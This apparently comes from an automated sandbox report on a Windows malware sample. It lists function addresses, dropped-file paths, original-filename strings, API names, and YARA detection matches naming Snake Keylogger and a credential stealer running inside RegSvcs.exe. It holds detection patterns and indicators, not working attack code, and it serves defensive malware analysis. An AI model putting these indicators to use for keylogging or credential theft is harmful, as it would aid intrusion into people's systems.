                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 6_2_063ECDC06_2_063ECDC0
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeCode function: 7_2_00C222AB7_2_00C222AB
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeCode function: 7_2_00C290F87_2_00C290F8
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeCode function: 7_2_00C2A5187_2_00C2A518
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeCode function: 7_2_00C22C007_2_00C22C00
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeCode function: 7_2_00C22C107_2_00C22C10
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeCode function: 7_2_00C238087_2_00C23808
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeCode function: 7_2_00C238107_2_00C23810
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeCode function: 7_2_025B2B587_2_025B2B58
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeCode function: 7_2_025BE7C87_2_025BE7C8
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeCode function: 7_2_025B4BE87_2_025B4BE8
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeCode function: 7_2_093488697_2_09348869
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeCode function: 7_2_0934AF587_2_0934AF58
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeCode function: 7_2_09342E307_2_09342E30
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeCode function: 7_2_09344EA07_2_09344EA0
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeCode function: 7_2_093432687_2_09343268
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeCode function: 7_2_093452D87_2_093452D8
                Source: C:\Users\user\AppData\Roaming\vQzHzddZ.exeCode function: 7_2_093436A07_2_093436A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_00E5C14711_2_00E5C147
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_00E5D27811_2_00E5D278
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_00E5537011_2_00E55370
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_00E5C73811_2_00E5C738
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_00E569A011_2_00E569A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_00E5E98811_2_00E5E988
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_00E5CA0811_2_00E5CA08
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_00E5CCD811_2_00E5CCD8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_00E59DE011_2_00E59DE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_00E53E0911_2_00E53E09
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_00E56FC811_2_00E56FC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_00E5CFA911_2_00E5CFA9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_00E5F63111_2_00E5F631
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_00E529EC11_2_00E529EC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_00E5E97A11_2_00E5E97A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_00E53AA111_2_00E53AA1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_00E5FA8811_2_00E5FA88
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_06362A9011_2_06362A90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_06361FA811_2_06361FA8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0636185011_2_06361850
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0636944811_2_06369448
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_06369D3811_2_06369D38
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0636514811_2_06365148
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0636D21811_2_0636D218
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0636D67011_2_0636D670
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0636D66011_2_0636D660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0636966811_2_06369668
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0636DAB911_2_0636DAB9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0636DAC811_2_0636DAC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_06360B3011_2_06360B30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0636DF2011_2_0636DF20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_06360B2011_2_06360B20
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0636DF1F11_2_0636DF1F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0636E37811_2_0636E378
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0636E36A11_2_0636E36A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_06361F9C11_2_06361F9C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0636E7D011_2_0636E7D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0636E7CF11_2_0636E7CF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0636003F11_2_0636003F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0636EC2811_2_0636EC28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0636EC1811_2_0636EC18
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0636F07111_2_0636F071
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0636004011_2_06360040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0636184111_2_06361841
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_06368CB011_2_06368CB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0636F08011_2_0636F080
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0636F4D811_2_0636F4D8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_06368CC011_2_06368CC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0636F4C811_2_0636F4C8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0636F93011_2_0636F930
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0636F92211_2_0636F922
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0636514011_2_06365140
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0636CDAF11_2_0636CDAF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_0636CDC011_2_0636CDC0
                Source: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeStatic PE information: invalid certificate
                Source: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe, 00000000.00000002.1226193501.00000000033CC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe
                Source: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe, 00000000.00000002.1226193501.00000000037E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe
                Source: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe, 00000000.00000002.1227795797.0000000004B39000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe
                Source: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe, 00000000.00000002.1227795797.0000000004EDE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe
                Source: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe, 00000000.00000002.1226025504.0000000003290000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe
                Source: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe, 00000000.00000000.1178261264.000000000103A000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamewtQo.exe" vs SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe
                Source: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe, 00000000.00000002.1233370265.000000000A1E6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXEj% vs SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe
                Source: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe, 00000000.00000002.1233592044.000000000A800000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe
                Source: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe, 00000000.00000002.1225421707.00000000015EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe
                Source: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe, 00000000.00000002.1226193501.0000000003331000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe
                Source: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeBinary or memory string: OriginalFilenamewtQo.exe" vs SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe
                Source: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 7.2.vQzHzddZ.exe.405cdb0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 7.2.vQzHzddZ.exe.405cdb0.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 7.2.vQzHzddZ.exe.405cdb0.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 7.2.vQzHzddZ.exe.405cdb0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 7.2.vQzHzddZ.exe.4019990.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 7.2.vQzHzddZ.exe.405cdb0.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 7.2.vQzHzddZ.exe.4019990.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 7.2.vQzHzddZ.exe.405cdb0.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 7.2.vQzHzddZ.exe.4019990.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4edee80.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4edee80.7.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4edee80.7.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4f222a0.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4f222a0.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4f222a0.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 7.2.vQzHzddZ.exe.4019990.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 7.2.vQzHzddZ.exe.4019990.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 7.2.vQzHzddZ.exe.4019990.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4f222a0.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4f222a0.5.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4f222a0.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4edee80.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4edee80.7.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4edee80.7.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0000000B.00000002.3642408543.000000000042E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000007.00000002.1259225217.0000000003811000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000007.00000002.1259225217.0000000004019000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.1227795797.0000000004EDE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe PID: 7708, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: vQzHzddZ.exe PID: 8152, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: RegSvcs.exe PID: 7460, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: vQzHzddZ.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4f222a0.5.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4f222a0.5.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4f222a0.5.raw.unpack, W---.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4edee80.7.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4edee80.7.raw.unpack, -.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4edee80.7.raw.unpack, W---.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.a800000.8.raw.unpack, o1p8OxvbbsHwvB8SLX.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.a800000.8.raw.unpack, o1p8OxvbbsHwvB8SLX.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4df4e00.6.raw.unpack, o1p8OxvbbsHwvB8SLX.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4df4e00.6.raw.unpack, o1p8OxvbbsHwvB8SLX.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4df4e00.6.raw.unpack, Pi1jAIH7qx7MOMF9DX.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4df4e00.6.raw.unpack, Pi1jAIH7qx7MOMF9DX.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4df4e00.6.raw.unpack, Pi1jAIH7qx7MOMF9DX.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4d6d5e0.4.raw.unpack, o1p8OxvbbsHwvB8SLX.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.4d6d5e0.4.raw.unpack, o1p8OxvbbsHwvB8SLX.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.a800000.8.raw.unpack, Pi1jAIH7qx7MOMF9DX.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.a800000.8.raw.unpack, Pi1jAIH7qx7MOMF9DX.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.SecuriteInfo.com.Variant.Lazy.487114.16188.14077.exe.a800000.8.raw.unpack, Pi1jAIH7qx7MOMF9DX.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
